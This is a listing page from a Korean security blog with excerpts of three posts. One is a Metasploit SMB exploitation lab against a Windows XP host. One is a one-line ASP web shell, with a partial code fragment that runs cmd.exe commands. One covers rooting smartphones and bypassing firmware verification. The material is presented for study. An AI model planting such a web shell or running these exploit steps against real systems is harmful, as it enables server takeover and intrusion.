리치윈드 (RichWind)

메타스플로잇을 활용한 간략한 보안 테스트를 진행해 보자. ㅇ XP: 192.168.182.152 (Victim) ㅇ backtrack : 192.168.182.151 (Attacker) SMB (Server Message Block) 취약점 활용 메타스플로잇 테스트 - 이기종 간 파일전송을 위해 만들어진 프로토콜이지만, 최근에는 프린터와 통신을 위해서 사용되고 있음 SMB 버전 및 취약점이 있는지 확인하는 module을 실행한다. SMB 취약점이 존재하므로, 관련된 Exploit 를 실행하고, 연결할 수 있는 payload를 실행한다. exploit 실행 meterpreter에서 추가 모듈 로드 (ex. load sniffer ) 후, 현재 로딩된 모듈 확인 (ex. load -l) 현재 Running ..

IT 이야기/보안 이야기 2020. 3. 10. 15:14

과거에 끄적 거리던 글을 정리하다가 남겨 본다. 소위 한줄 웹쉘이라 불리는 Simple Web Shell 이다. 이제는 잘 사용하지 않는 ASP 환경에서 구동되었던 웹쉘인데, 언어가 바뀌어도 로직은 그대로 이기 때문에 웹쉘의 기능상으로 크게 변동이 없다. 아래는 간략히 로직을 파악하기 위한 것이다. (부적절한 곳에 사용하지 말고, 보안을 강화하기 위한 공부 용도로 사용하길 바란다.) TEST END! Command Form Command : Reslut: 명령어 라인 Dim WshShell,oExec,cc: CMD="dir": Set WshShell = CreateObject("WScript.Shell"):Set oExec = WshShell.Exec("cmd.exe /c"+CMD): response.W..

IT 이야기/보안 이야기 2020. 3. 10. 14:49

최근 오래된 스마트폰을 재활용하는 주제에 관심을 가지는 분들이 많은 것 같아요. 오래된 스마트폰을 그냥 방치하기에는 아깝기도 하거니와, 최근 오래된 스마트폰을 활용한 네비게이션,. 블랙박스,. 운전지원 카메라 등으로 활용하는 애플리케이션 들이 다수 등장하고 있기 때문이다. 이러한 동기로 스마트폰을 재활용하는 주제에 관심을 갖게 되었다. 여기서 한가지 해결해야한 사항이 있습니다만, 오래된 스마트폰에 다음과 같은 수정이 필요한데, 이게 기술적 레벨이 좀 있습니다. 커스텀 펌웨어 업데이트, 플래싱 루팅 (SuperSU) mount 변경 lpm파일 내용 변경 펌웨어 verification check bypass 1. 커스텀 펌웨어 플래싱 (Flashing Custom Firmware ) 스마트폰의 롬메모리에 기..

IT 이야기/보안 이야기 2020. 3. 10. 10:05